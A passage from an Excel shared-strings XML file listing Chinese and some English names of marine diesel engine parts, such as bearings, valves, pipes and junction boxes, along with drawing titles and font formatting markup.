        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格栅</t>
    </r>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴毂</t>
    </r>
  </si>
  <si>
    <t>W5010023</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REV</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>内六角螺栓</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>带止点定位螺丝</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>连接块</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>六角螺栓</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>二位三通电磁阀</t>
  </si>
  <si>
    <t>入口</t>
  </si>
  <si>
    <t>执行器</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>防爆灯</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>装配说明</t>
  </si>
  <si>
    <t>空冷器拆装</t>
  </si>
  <si>
    <t>辅助风机</t>
  </si>
  <si>
    <t>底板</t>
  </si>
  <si>
    <t>曲柄销轴承盖</t>
  </si>
  <si>
    <t>主轴承座</t>
  </si>
  <si>
    <t>BONNET</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>槽</t>
  </si>
  <si>
    <t>座</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>底板</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>电缆槽</t>
  </si>
  <si>
    <t>插销</t>
  </si>
  <si>
    <t>链</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>接线箱盖板</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>盖</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>十字头油泵</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>下料图</t>
  </si>
  <si>
    <t>主轴承座</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>废气旁通</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>膨胀节</t>
  </si>
  <si>
    <t>膨胀节</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>法兰</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>方法兰</t>
  </si>
  <si>
    <t>方法兰</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>扁钢</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>燃油泄漏回油管</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>垫片</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GASKET 4-PARTS</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>四半式刮油环</t>
  </si>
  <si>
    <t>加热管</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>工字钢</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>指示器</t>
  </si>
  <si>
    <t>INDICATOR</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>示功阀</t>
  </si>
  <si>
    <t>规范</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>仪表盘布置图</t>
  </si>
  <si>
    <t>隔热</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>垫圈</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>KONGSBERG CONTROL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>康士伯控制系统</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>灯座</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>灯座及电缆槽布置图</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>汽缸油注油枪</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>外螺纹接头</t>
  </si>
  <si>
    <t>发动机标牌</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>针嘴</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>接头</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>油雾探测器</t>
  </si>
  <si>
    <t>节流板</t>
  </si>
  <si>
    <t>燃油喷嘴</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>下半挡油盖</t>
  </si>
  <si>
    <t>上半挡油盖</t>
  </si>
  <si>
    <t>油管</t>
  </si>
  <si>
    <t>油管</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>冷却水管</t>
  </si>
  <si>
    <t>冷却水管</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>冷凝水泄放管</t>
  </si>
  <si>
    <t>管卡</t>
  </si>
  <si>
    <t>活塞环</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>板</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>压力开关及传感器</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>栏杆</t>
  </si>
  <si>
    <t>栏杆</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>研磨装置</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>伺服油共轨</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>轴</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>焊座</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPUR-GEARED CHAIN BLOCK</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>U型螺栓</t>
  </si>
  <si>
    <t>直通接头</t>
  </si>
  <si>
    <t>T型接头</t>
  </si>
  <si>
    <t>接线箱</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>E10接线箱</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>节流块</t>
  </si>
  <si>
    <t>节流块</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>缸盖液压拉伸器</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>葫芦吊</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>盘车机</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>阀</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>走台</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>空冷器清洗装置</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>干洗及水洗布置</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAW</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>卡爪</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>管系部套概览</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>名称</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2通端子</t>
  </si>
  <si>
    <t>二位三通截止阀</t>
  </si>
  <si>
    <t>二位三通阀</t>
  </si>
  <si>
    <t>4孔导线接地端子</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二位五通电磁阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>蓄压器</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台装配零件配件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附加平台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>可调接头</t>
  </si>
  <si>
    <t>可调油头</t>
  </si>
  <si>
    <t>调整杆</t>
  </si>
  <si>
    <t>空气瓶</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气导管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>精密无缝钢管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气分离器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀空气弹簧管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气瓶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>气孔</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警模块原理图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放大器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>锚定板</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角钢</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>直角温度计</t>
  </si>
  <si>
    <t>直角接头</t>
  </si>
  <si>
    <t>退货说明</t>
  </si>
  <si>
    <t>耐磨环</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>长臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥测温度计布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞的安装和拆卸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器的安装和拆卸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩垫片的安装和拆卸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电机安装和拆卸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装与拆解装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装和拆卸装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>填料函的安装</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器安装和拆卸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装和拆卸装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>辅助风机拆装</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动润滑器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>自清滤器</t>
  </si>
  <si>
    <t>辅助鼓风机开关箱</t>
  </si>
  <si>
    <t>轴向减震器</t>
  </si>
  <si>
    <t>轴向减震器监测</t>
  </si>
  <si>
    <t>膨胀接头</t>
  </si>
  <si>
    <t>滑阀</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>皮卡套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>球阀</t>
  </si>
  <si>
    <t>球阀规范</t>
  </si>
  <si>
    <t>齿轮齿形</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈钢板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>轴承</t>
  </si>
  <si>
    <t>轴承衬套</t>
  </si>
  <si>
    <t>轴承盖</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>下半轴承材料订货图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>十字头轴承盖</t>
  </si>
  <si>
    <t>凸轮轴轴承箱体焊接图</t>
  </si>
  <si>
    <t>供油单元壳体</t>
  </si>
  <si>
    <t>轴承付</t>
  </si>
  <si>
    <t>轴承销</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>轴瓦运行层</t>
  </si>
  <si>
    <t>曲柄销轴瓦</t>
  </si>
  <si>
    <t>十字头轴瓦</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>机座</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座校中</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>机座排油</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲铆钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模块原理图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带箱量缸表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>镗孔图</t>
  </si>
  <si>
    <t>插座盒</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>花纹板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>两半式衬套</t>
  </si>
  <si>
    <t>蝶阀</t>
  </si>
  <si>
    <t>电缆</t>
  </si>
  <si>
    <t>电缆套管</t>
  </si>
  <si>
    <t>电缆扎带</t>
  </si>
  <si>
    <t>电缆填料函</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>填料函</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缆线列表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>电缆护管</t>
  </si>
  <si>
    <t>电缆插座</t>
  </si>
  <si>
    <t>接线规范</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮滚子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>曲轴</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>万向轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下罩壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上罩壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中央冷却水系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>中间板</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定心螺柱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>槽板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器箱体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>电气组件检查说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主起动阀检查管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>断路开关</t>
  </si>
  <si>
    <t>夹紧板</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹紧螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装版</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>紧定螺钉</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加紧套筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管卡爪接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹卡爪接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>清洗说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>闷头</t>
  </si>
  <si>
    <t>线圈</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞下部污油收集总管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器冷凝水收集总管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀泄漏油收集总管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>填料函污油收集总管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座泄放油收集总管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸冷却水总管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油水收集总管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
